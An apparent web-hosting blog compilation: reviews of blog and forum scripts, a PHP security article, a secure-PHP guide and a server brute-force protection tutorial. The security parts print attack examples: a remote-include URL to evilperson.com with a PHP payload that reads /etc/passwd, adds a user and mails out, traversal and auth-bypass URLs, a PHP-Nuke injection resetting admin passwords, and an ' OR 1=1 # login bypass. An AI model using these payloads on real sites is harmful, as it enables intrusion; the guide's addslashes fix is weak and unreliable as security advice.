In the web hosting industry, there are a lot more blog scripts than you could compare however we have attempted to pick the most used, popular and properly taken care of. Due to the ease of creating a blog scripts, there are literally thousands of them everywhere as most of the time, new PHP developers create a blog for their first script.

We have reviewed here the top 3 most used blogs, the industry-leading WordPress at the moment, b2evolution, a famous alternative that can both be a photo gallery & a content management system and MovableType, another very professional blog script which is very useful of news-related blog sites because it has a very powerful editor and its expandability.

Wordpress

b2\cafelog, more commonly known as simply b2 or cafelog, was the precursor to WordPress. b2\cafelog was estimated to have been employed on approximately 2,000 blogs as of May 2003. It was written in PHP for use with MySQL by Michel Valdrighi, who is now a contributing developer to WordPress. Though WordPress is the official successor, another project, b2evolution, is also in active development.
WordPress first appeared in 2003 as a joint effort between Matt Mullenweg and Mike Little to create a fork of b2.

In 2004 the licensing terms for the competing Movable Type package was changed by Six Apart, and many of its users migrated to WordPress – causing a marked and continuing growth in WordPress’s popularity.

User friendliness: 5

WordPress is pretty much unmatchable in its user friendliness, an eight year old would be able to configure it and start posting his own posts, first of all the hosting and installation procedure is very simple and it’s the famously called “2 minute install”, also if you are not very familiar most of the cPanel web hosting companies offer WordPress hosting or quick install using Fantastico within a few minutes. After installing, the administrator control panel is a perfectly sculpted two-tier navigation that’s right to the point, you just know where everything is supposed to be, WordPress has really exceeded the limits of being user friendly without being too bloaty, also the new 2.5 administrator theme is certainly impressing.

Security: 3

While security is still something in the works of the WordPress factory, there has been a research that there was actually 98% of the WordPress installs are actually vulnerable due to plugins, the API to create plugins is very simple which means everyone makes their plugins but most of the developers make the mistakes and become vulnerable to all type of security problems. WordPress 2.0 has been released in December 2005, so in around 3 years, WordPress had around 30 serious vulnerabilities however due to the fact that there are so many plugins around, the chances of decreasing your site security is more when using more plugins.

Reliablity: 4.5

Most of the very popular blogs are hosted using WordPress, they are usually running a heavily modified version to prevent any security risks and also because of their custom needs, GM has a few sites that are powered by WordPress and no one would be able to identify them as a site powered by WordPress as there are pretty much no signs left of WordPress, however due to the increase of the expandability, a lot of sites opt to create their own “fork” of WordPress and forget any other versions.

b2evolution

b2evolution is a multi-lingual, multi-user, multi-blog publishing system written in PHP and backed by a MySQL database. It is distributed under the GNU General Public License and is available without charge. François Planque forked b2evolution from version 0.6.1 of b2\cafelog in 2003. Another popular fork of b2 is WordPress.

b2evolution is focused on ease of installation and feature richness. It can easily be installed on almost any LAMP (Linux, Apache, MySQL, PHP) host in a matter of minutes. With the latest release, no configuration file editing is necessary, as all configuration is handled through the installer or administrative back-end.

User friendliness: 3.5

B2evolution blog has attempted to be very user friendly however again this isn’t something that is a strong point of itself, in the section of multi-blog multi-user, it certainly has a huge advantage as it has been primarily made for that purpose, also, the user interface looks however kind of outdated and certainly could use a facelift, everything seems to be in so close and looks very cluttered, the backend could use a lot of work to make it look better and more proper and acceptable.

Security: 5

Again, security comes higher than usability here, in its history, b2evolution had only had 6 security issues which gives it top marks in security, there isn’t anything at all that can be added as the way it has been coded was that any plug-in that are made could or might be made by a new coder which could make any SQL injection mistakes, doing that might have decreased the expandability and everything else in general however with that limitations there is the very noticeable security increase.

Reliablity: 3.5

The reliability of b2evolution is not yet proved that much, considering that we don’t see that much of sites that use it at the moment, WordPress and other blog scripts have taken over the blog market in a very superior way, also hosted blog websites such as the ones provided by WordPress their selves and such as Google’s Blogger seriously handicap the ability of b2evolution to be a valid competitor in this market, while there are a few sites that are still using it, however most of the sites have stopped using it.

MovableType

Movable Type was originally named “Serge” after musician Serge Gainsbourg. The TrackBack feature was introduced in version 2.2, and has since been adopted by a number of other blog systems.

With the release of version 3.0, there were marked changes in Movable Type’s licensing, most notably placing greater restrictions on its use without paying a licensing fee. This sparked criticism from some users of the software. With the release of Movable Type 3.2, the ability to create an unlimited number of weblogs at all licensing levels was restored. In Movable Type 3.3, it is completely free for personal users.

Six Apart released Movable Type 4 beta on June 5, 2007 and re-launched movabletype.org as a community site for purposes of developing an open-source version that was released under GPL on December 12, 2007. Movable Type Enterprise version provides advanced features such as LDAP management, enterprise database integration such as Oracle, MySQL, user roles, blog cloning and automated blog provisioning. It is also available as part of Intel’s SuiteTwo professional software offering of Web 2.0 tools.

User friendliness: 5

MovableType have came up with a revolutionary control panel to manage your blog, using the same control panel, you are actually able to manage multiple blogs by identifying them by the domain name and it uses a two tier navigation system with drop-down menus so that it actually looks exactly like a user interface of a specific application or whatsoever. It certainly looks very impressing and very modern, it also looks very professional.

Security: 4.5

MovableType has a very secure history, only 4 total security advisories which is certainly a very impressive number considering on how it popular it is, however a main reason why is because previously in the 3.X versions, it was commercialized which meant that it had to be perfectly secure code so that you would be able to sell it, starting 4.X, the MovableType script is completely open-source and since then the participation and the popularity of the script has increased majorly.

Reliablity: 3

MovableType is a very good alternative however because it was previously commercialized, people still have the image that it is actually still paid software so they don’t take it as a valid option when picking their next script for their blog, now that it is an open-source software, it’s starting to have a big advantage over others as it was commercialized professional software before, this should eventually make up for a great application eventually.

To sum up this comparison, MovableType is a great option for the future as WordPress has a big competitor at the moment that no one knows about however b2evolution is still there for the multi-user multi-blog market as they have always led that part of the blog hosting industry. There seems to be a very promising future in the blog scripts with MovableType going from commercial t open-source.

A lot of web hosting users are confused when they are trying to create their first community on which forum script to pick for their community as changing options down the line isn’t something that is preferred or can be easily done.

We are going to compare all 3 most popular scripts on a few points such as their user friendliness, security and reliability, these are the most important points when picking your forum script, however just because one of the contenders win doesn’t make it the best script out there, the needs of each person is different however we’re only comparing them in the case of general audience.

phpBB

phpBB was first created by James Atkinson (theFinn) in June 2000 as a UBB-like forum solution for his wife. Once released to the public through SourceForge, it gained popularity very quickly, and by December of the same year v1.0.0 was released. Two additional major releases, 1.2 and 1.4, were made in February and April of 2001. During this time, the development team expanded to include Bart van Bragt (BartVB) and Paul S. Owen (psoTFX). Work on phpBB 2.0.x began in February of 2001. phpBB2 was built entirely from scratch, and took an entire year to complete.

Finally, in April of 2002, phpBB 2.0.0 was made available to the public. The 2.0.x line of phpBB has since risen to become the most successful opensource bulletin board software worldwide. Work on phpBB 2.2 was started almost immediately and continued over the following years. On January 14, 2005, it was announced that phpBB 2.2 would be no more. Due to the large scale changes made to the codebase and the lack of backwards compatibility with phpBB 2.0.x., it was decided that the next version of phpBB would have to be 3.0.0, as is required under the Linux Kernel numbering system. Thus, phpBB3 “Olympus” was born.

User friendliness: 4.5

phpBB can be installed using Fantastico on most web hosting providers automatically with a couple of clicks which is a big plus for user friendliness and also the new subSilver theme that is included with phpBB 3 certainly looks very impressive and a lot more professional compared to the previous one included in phpBB 2, the administrative side has got a facelift which makes it look a lot better with better usability, while administrative control panels have always had design flaws on how to distribute data well through pages, phpBB certainly came up with good ways to bypass that. Also, it has been made more as a plug and play forum starting phpBB 3 compared to the previous hours of configuration spent to configure and find a decent theme for it.

Security: 4

Security is a pretty strong point for phpBB considering that for the previous 7 years, phpBB 2 had 38 security advisories, around 5 per year might be a high number but at the number of users that use it, it is very low. However the phpBB 3 seems to be going very strong, since its launch date which was 13th of December 2007 till now, which is around 6-7 months, and it has only had 1 security advisory which makes it very secure compared to other forum scripts around.

Reliability: 5

phpBB runs the world’s biggest online forum at the moment which is the Gaia online forum, it has 1,334,740,294 posts and over 12,589,038 members, these numbers are very big, the second biggest phpBB forum which is a Brazilian games forum has over 102,704,207 posts and 167,802 – The difference is huge but millions of posts and all these popular forums running phpBB with no problem is certainly very impressive and gives phpBB top marks for its reliability

Overall score: 14/15

The final score for phpBB is very high and it’s not surprising considering according to a small Google check, it is currently hosting over 6,680,000 forums and a big reason why is because of it’s popularity and how it’s very secure and reliable.

SMF

SMF was created to replace the forum software YaBB SE, which at the time was gaining a bad reputation because of problems with its Perl-based equivalent and similarly named software YaBB. YaBB was known to cause resource allocation problems and was resource heavy on many systems, in its earlier versions. YaBB SE was written as a rough PHP port of YaBB, but tended to have many of the same resource and even security problems since it was a port of the insecure Perl version. Joseph Fung and Jeff Lewis of Lewis Media Inc., the owners of YaBB SE and the original owners of SMF, made the decision to convert to a new brand and name.

SMF started as a small project by one of the YaBB SE developers and its main intent was to add more advanced templating to YaBB SE. The project then slowly grew to address common feature requests, efficiency problems, and security concerns. A rehaul of YaBB SE had been in development for several years, but was superseded by this then competing project. Popular interest in the new YaBB SE fork sparked a complete rewrite of the code, with security and performance in mind. This eventually became today’s Simple Machines Forum. The first SMF release was SMF 1.0 Beta 1a, released on 30 September 2003 to Charter Members only.

On the 23rd of October 2006, Simple Machines LLC was registered in the state of Arizona, and the transfer of copyrights from Lewis Media to Simple Machines LLC was completed on the 24th of November 2006 during a three-day retreat in Tucson, AZ. This was done for the “[solidification of] the team’s commitment to continuously providing free software, without the perceived risks of corporate influence”

User friendliness: 3.5

From all 3 forums, SMF doesn’t get a lot of credit for its user friendliness; the user interface that it comes with is very old and looks very outdated, it has been the same for quite a few years now with no face lift at all. The administrator panel is a lot more crowded/harder to understand than other scripts, the initial score for user friendliness was 3 however one neat feature that is given for is the web install, to sum it up, instead of having to download, uncompress, upload, install, you download one PHP file that does all of that, it’s very suitable and helpful however the UI still needs a lot more work for it to be on par. A plus because it can be automatically installed using Fantastico with a couple of clicks.

Security: 5

SMF might not take the pie at user friendliness but it steals it at security, for the past 4 years, it has only had 7 security advisories which means around 2 per year which is a big difference compared to the other forums, the elements and the main code is very secure which makes it a very good forum on the backend, however because it is not often updated, not having a lot of security advisories isn’t a surprise for a stable untouched product.

Reliability: 4

SMF isn’t popular amongst big forums, the biggest forum at the moment that is hosted by SMF has 4,358,549 posts and 30, 795 – While it is not very popular however it is secure which is why it’s reliability marks are a bit high, also it has a good implementation with Joomla which makes it one of the more popular choices for Joomla users, it is also being used on the Joomla support forum.

Overall score: 12.5/15

The overall score for SMF is expected; it has a lot of work to be done on feature-wise however it is very impressive on its security part and could be very well a future reliable forum script. It would be very useful to have it for a public forum with minimal features but maximum security.

MyBB

MyBB’s roots lie in the discussion boards XMB and DevBB — Years ago, Chris Boulton, web34rk and b0ndman started developing XMB. After some time, web34rk and b0ndman left the team and Chris became lead developer of a team with two other developers. Over time, staff shifted again and several developers didn’t like the way things were heading. Together, they forked XMB and created DevBB. DevBB was the predecessor to MyBB, a temporary solution for people to use whilst MyBB was being developed. Development teams changed frequently, but MyBB is still here with Chris Boulton as lead developer since 2002.

User friendliness: 4.5

The user friendliness of MyBB is very good, considering that it is a new player in the free forums game however it has been evolving fast and taking over the forums market quickly because of its very simple down-to-earth setup and configuration, it facilitates management of your forum by making everything a lot simpler but at the same time still having the capacities of advanced management such as provided in other good scripts or even good paid forum scripts. A small minus is that it is not automatically installable on web hosts using Fantastico.

Security: 3.5

The security is a major issue with MyBB, it is generally secure however it needs a lot more work, considering that it had 34 security advisories in the past 4 years which means around 9 security advisories per year, that is very high however it is still a new script and it has a lot of work to go into it, the more work that is done on it, the more it should be stable in the future, I wouldn’t be surprised if the initial versions of other forums would have as much exploits as this, however MyBB has a history of quickly addressing security issues and letting their clients know.

Reliability: 4

MyBB is very reliable because of how quick it is updated and is slowly starting to be adapted by big forums, one of the big forums that is ran by MyBB has over 3 million posts and 30 thousand members, a forum dedicated to NCAA (college sports). Another couple of forums with 100K posts are coming up soon, also the upcoming versions of MyBB have support for clustered MySQL database setups which gives them a big advantage for hosting big forums.

Overall score: 12/15

MyBB is still a work in progress and the release of their new upcoming 1.4 version might change a lot and should change a lot however the current status is very good and this project seems to be heading to the right track and following the tracks of other popular scripts.

Conclusion

To conclude, our winner is phpBB which is by far the best for the current time, it has been working forever for the past years with no problems and the release of phpBB 3 separates it from the competition by far however MyBB is upcoming well with their 1.4 release and SMF are still focusing on the very secure forum script.

The goal of this article is to show common threats and challenges of programming secure PHP applications. The wonderful thing about PHP is that people with little or even no programming experience are able to achieve simple goals very quickly. The problem, on the other hand, is that many programmers are not really conscious about what is going behind the curtains. Security and convenience do not often go hand in hand — but they can.

PHP has some very flexible file handling functions. The include(), require() and fopen() functions accept local path names as well as remote files using URLs. A lot of vulnerabilities I have seen are due to incorrect handling of dynamic file or path names.

On a site I will not mention in this article (because the problem still has not been solved) has one script which includes various HTML files and displays them in the proper layout. Have a look at the following URL:

http://example.com/page.php?i=contact.html

The variable $i obviously contains the file name to be included. When you see a URL like this, a lot of questions should come to your mind:

- Has the programmer considered directory traversals like i=../../../etc/passwd?
- Does he check for the .html extension?
- Does he use fopen() to include the files?
- Has he thought about not allowing remote files?

In this case, every answer was negative. Time to play! Of course, it is now possible to read all the files the httpd user has read access for. But what is even more exciting is the fact that the include() function is used to include the HTML file. Consider this:

http://example.com/page.php?i=http://evilperson.com/badscript.html

Where exec.html contains a couple of lines of code:

<?php
passthru ('cat /etc/passwd');
passthru ('useradd myuser -p password');
passthru ('echo another hacked server! | mail hacker@internet.com');
?>

I am sure you get the idea. A lot of bad things can be done from here.

Per default, PHP writes most of the variables into the global scope. Of course, this is very convenient. On the other hand, you can get lost in large scripts very quickly. Where did that variable come from? If it is not set, where could it come from? All EGPCS (Environment, GET, POST, Cookie, and Server) variables are put into the global scope.

The global associative arrays $HTTP_ENV_VARS, $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_COOKIE_VARS, $HTTP_SERVER_VARS and $HTTP_SESSION_VARS will be created when the configuration directive track_vars is set. This allows you to look for a variable only in the place you expect it to come from. Note: As of PHP 4.0.3, track_vars is always turned on.

This security hole was reported to the Bugtraq mailing list by Ismael Peinado Palomo on July 25th, 2001. Mambo Site Server 3.0.x, a dynamic portal engine and content management tool based on PHP and MySQL, is vulnerable to a typical global scope exploit. The code has been modified and simplified.

Under the ‘admin/’ directory, index.php checks whether the password matches the one in the database after posting the form:

<?php
if ($row['pass'] == $postedpass) {
session_register("name");
session_register("fullname");
session_register("id");
header("Location: index2.php");
}
?>

When the passwords match, the variables $name, $fullname and $id are registered as session variables. The user then gets redirected to index2.php. Let us see what happens there:

<?php
if (!$PHPSESSID) {
header("Location: index.php");
exit(0);
} else {
session_start();
if (!$name) session_register("name");
if (!$fullname) session_register("fullname");
if (!$id) session_register("id");
}
?>

|If the session ID has not been set, the user will be directed back to the login screen. If there is a session ID, though, the script will resume the session and will put the previously set session variables into the global scope. Nice. Let us see how we can exploit this. Consider the following URL:

http://example.com/admin/index2.php?PHPSESSID=1&name=admin &fullname=brian&id=admin

The GET variables $PHPSESSID, $name, $fullname and $id are created as global variables per default. So when you look at the if-else-structure above, you will notice that the script figures $PHPSESSID is set and that the three variables dedicated to authorize and identify the user can be set to anything you want. The database has not even been queried. A quick fix for this problem — by far not the perfect one — would be to check for $HTTP_SESSION_VARS['id'] or $_SESSION['id'] (PHP => v4.1.0) instead of $id.

Programming in PHP would be boring without a decent SQL database connected to the web server. However, assembling SQL queries with unchecked variables is a dangerous thing to do.

The following bug in PHP-Nuke 5.x has been reported to the Bugtraq mailing on August 3, 2001. It is actually a combination of exploiting global variables and an unchecked SQL query variable.

The PHP-Nuke developers decided to add the “nuke” prefix to all tables in order to avoid conflicts with other scripts. The prefix can be changed when multiple Nuke sites are run using the same database. Per default, $prefix = "nuke"; is defined in the configuration file config.php.

Let us now look at a few lines from the script article.php.

<?php
if (!isset($mainfile)) {
include("mainfile.php");
}
if (!isset($sid) && !isset($tid)) {
exit();
}
?>

And a bit further down: the SQL query.

<?php
mysql_query("UPDATE $prefix"._stories.
" SET counter=counter+1 where sid=$sid");
?>

To change the SQL query, we need to make sure $prefix is not set to its default value so we can set an arbitrary value via GET. The configuration file config.php is included in mainfile.php. As we know from the last chapter, we can set the variables $mainfile, $sid and $tid to any value using GET parameters. By doing so, the script will think mainfile.php has been included and $prefix has been set accordingly. Now, we are in a position to execute any SQL query starting with UPDATE. So the following query will set all admin passwords to ‘1′:

http://phpnukesite.com/article.php?mainfile=1&sid=1&tid=1 &prefix=nuke.authors%20set%20pwd=1%23

The query now looks like this:

UPDATE nuke.nuke_authors set pwd=1#_stories
SET counter=counter+1 where sid=$sid

Of course, anything after # will be considered as a comment and will be ignored.

More to come.

PHP is a very easy language to learn and many people without a big knowledge in programming are learning it to make their sites more interactive. Unfortunately, there is a big percentage of those who are unaware of the security risks. Here are most common ones:

Never trust any users on your site
Never, Ever, Trust Your Users. Assume every single piece of data your site collects from a user contains malicious code. Always. That includes data you think you have checked with client-side validation, for example using JavaScript. If you can manage that, you’ll be off to a good start. If PHP security is important to you, this single point is the most important to learn.

register_globals
If you’re an advanced PHP programmer, you’ll most probably know about this. register_globals makes every variable that comes into the script global. (ex: my page is index.php and a visitor visits index.php?p=3. my $p variable is 3.)


if ($password == "mypassword") {
$authorized = 1;
}
if ($authorized == 1) {
echo "my important area";
}


If your server or PHP install has register_globals on then anyone accessing your page: page.php?authorized=1 will gain access to it.

There are two ways to fix a problem like this:
1. Create a .htaccess file & put the following: php_flag register_globals off. However; take note that if you have coded your script in an enviroment with register_globals (where $_POST, $_GET, $_REQUEST is not used). It will break your script.

2. Simply insert a $variable = 0 before you utilize your variable which means if anyone tried using ?authorized=1 then it would be automatically unset.

Error Messages
Errors are a very useful tool for both programmer and hacker. A developer needs them in order to fix bugs. A hacker can use them to find out all sorts of information about a site, from the directory structure of the server to database login information. If possible, it is best to turn off all error reporting in a live application. PHP can be told to do this through the .htaccess or php.ini, by setting “error_reporting” to “0″. If you have a development environment, you can set a different error reporting level for that. You can also write error_reporting(0); in the beginning of your script.

SQL Injection
One of PHP’s greatest strengths is the ease with which it can communicate with databases, most notably MySQL. Many people make extensive use of this, and a great many sites, rely on databases to function.

However, as you would expect, with that much power there are potentially huge security problems you can face. Fortunately, there are plenty of solutions. The most common security hazard faced when interacting with a database is that of SQL Injection - when a user uses a security glitch to run SQL queries on your database.

Let’s use a common example. Many login systems feature a line that looks a lot like this when checking the username and password entered into a form by a user against a database of valid username and password combinations, for example to control access to an administration area:

$check = mysql_query(”SELECT Username, Password, UserLevel FROM Users WHERE Username = ‘”.$_POST[’username’].”‘ and Password = ‘”.$_POST[’password’].”‘”);

If I enter the following into the “username” input box in the form and submit it:

‘ OR 1=1 #

The query that is going to be executed will now look like this:

SELECT Username, Password FROM Users WHERE Username = ” OR 1=1 #’ and Password = ”

The hash symbol (#) tells MySQL that everything following it is a comment and to ignore it. So it will actually only execute the SQL up to that point. As 1 always equals 1, the SQL will return all of the usernames and passwords from the database. And as the first username and password combination in most user login databases is the admin user, the person who simply entered a few symbols in a username box is now logged in as your website administrator, with the same powers they would have if they actually knew the username and password.

With a little creativity, the above can be exploited further, allowing a user to create their own login account, read credit card numbers or even wipe a database clean.

Fortunately, this type of vulnerability is easy enough to work around. By checking for apostrophes in the items we enter into the database, and removing or neutralizing them, we can prevent anyone from running their own SQL code on our database. The function below would do the trick:
function make_safe($variable) {
$variable = addslashes(trim($variable));
return $variable;
}

Instead of using _POST variables as in the query above, we now run all user data through the make_safe function, resulting in the following code:
$username = make_safe($_POST['username']);
$password = make_safe($_POST['password']);
$check = mysql_query("SELECT Username, Password, UserLevel FROM Users
WHERE Username = '".$username."' and Password = '".$password."'");

If a user entered the malicious data above, the query will look like the following, which is perfectly harmless. The following query will select from a database where the username is equal to “\’ OR 1=1 #”.

SELECT Username, Password, UserLevel FROM Users WHERE Username = ‘\’ OR 1=1 #’ and Password = ”

Unless you happen to have a user with a very unusual username and a blank password, your malicious attacker will not be able to do any damage at all. It is important to check all data passed to your database like this, however secure you think it is. HTTP Headers sent from the user can be faked. Their referral address can be faked. Their browsers User Agent string can be faked.

File Manipulation
Some sites currently running on the web today have URLs that look like this:

index.php?page=contactus.html

The “index.php” file then simply includes the “contactus.html” file, and the site appears to work. However, the user can very easily change the “contactus.html” bit to anything they like. For example, if you are using Apache’s mod_auth to protect files and have saved your password in a file named “.htpasswd” (the conventional name), then if a user were to visit the following address, the script would output your username and password:

index.php?page=.htpasswd

By changing the URL, on some systems, to reference a file on another server, they could even run PHP that they have written on your site. Fortunately, again, this is reasonably easy to protect against. First, make sure you have correctly set “open_basedir” in your php.ini file, and have set “allow_url_fopen” to “off”. That will prevent most of these kinds of attacks by preventing the inclusion of remote files and system files. Next, if you can, check the file requested against a list of valid files. If you limit the files that can be accessed using this script, you will save yourself a lot of aggravation later.

Using Defaults
When MySQL is installed, it uses a default username of “root” and blank password. SQL Server uses “sa” as the default user with a blank password. If someone finds the address of your database server and wants to try to log in, these are the first combinations they will try. If you have not set a different password (and ideally username as well) than the default, then you may well wake up one morning to find your database has been wiped and all your customers’ credit card numbers stolen. The same applies to all software you use - if software comes with default username or password, change them.

Leaving Installation Files Online
Many PHP programs come with installation files. A number of these are self-deleting once run, and many applications will refuse to run until you delete the installation files. Many a times, the install files are still online. If they are still online, they may still be usable, and someone may be able to use them to overwrite your entire site.
_______________________________________________________________
Original article by Dave Child. Released under a Creative Commons License.

Today, I recieved an email from my server notifying me that someone was actually trying to brute-force into the server so I thought I’d make a tutorial how to protect yourself or your server.

First, you’ll need APF to be installed, I’m not going to go in details on how to setup the firewall, but you’ll simply need it install so that BFD (brute force detector) can block the IP from trying to “brute force”.

Installing APF
cd ~
wget http://www.rfxnetworks.com/downloads/apf-current.tar.gz
tar -xvzf apf-current.tar.gz
rm -f apf-current.tar.gz
cd apf-*
sudo sh install.sh

Installing BFD
cd ~
wget http://www.rfxnetworks.com/downloads/bfd-current.tar.gz
tar -xvzf bfd-current.tar.gz
rm -f bfd-current.tar.gz
cd bfd-*
sudo sh install.sh

Configuring BFD
Use your favorite text editor (I prefer nano) to edit the configuration file, /usr/local/bfd/conf.bfd

Find
ALERT_USR="0"
and replace it with
ALERT_USR="1"

Find
EMAIL_USR="root"
and replace it with
ALERT_USR="your.email@webserver.com"

Save your modifications and exit your editor, start BFD using the line
/usr/local/sbin/bfd -s

Now, whenever BFD will detect a bruteforce, it will email you at the email set above & BFD will run the command /etc/apf/apf -d the.attackers.ip

The emails you will usually recieve look like this:

Jul 29 08:22:40 yourhostname sshd[21642]: Invalid user manfred from the.attackers.ip
Jul 29 08:22:40 yourhostname sshd[21643]: Invalid user michi from the.attackers.ip
Jul 29 08:22:42 yourhostname sshd[21642]: Failed password for invalid user manfred from the.attackers.ip port 48215 ssh2
Jul 29 08:22:42 yourhostname sshd[21643]: Failed password for invalid user michi from the.attackers.ip port 48223 ssh2
Jul 29 08:22:44 yourhostname sshd[21646]: Invalid user michi from the.attackers.ip
Jul 29 08:22:47 yourhostname sshd[21646]: Failed password for invalid user michi from the.attackers.ip port 48322 ssh2
Jul 29 08:22:47 yourhostname sshd[21647]: Failed password for postgres from the.attackers.ip port 48329 ssh2

Oh, and one thing I have done after I recieved the attack, I immeditaly changed the default SSH port. Use your favorite text editor (nano again!) to edit /etc/ssh/sshd_config

Find
#Port 22
And uncomment the line (Remove the #) and replace the 22 by the port you want SSH to use (Max. port number is 49151 so make sure you don’t put anything past that. Afterwards, restart SSH. Usually on CentOS it is service sshd restart and in other operating systems, it is /etc/rc.d/init.d/sshd restart

After getting attacked, I did a WHOIS on the IP (Run whois the.attackers.ip). You’ll usually see one of the emails something like abuse@somedomain.com.

Make sure to send them an email including the logs from the email, your server IP and the attackers IP.

Thanks alot for reading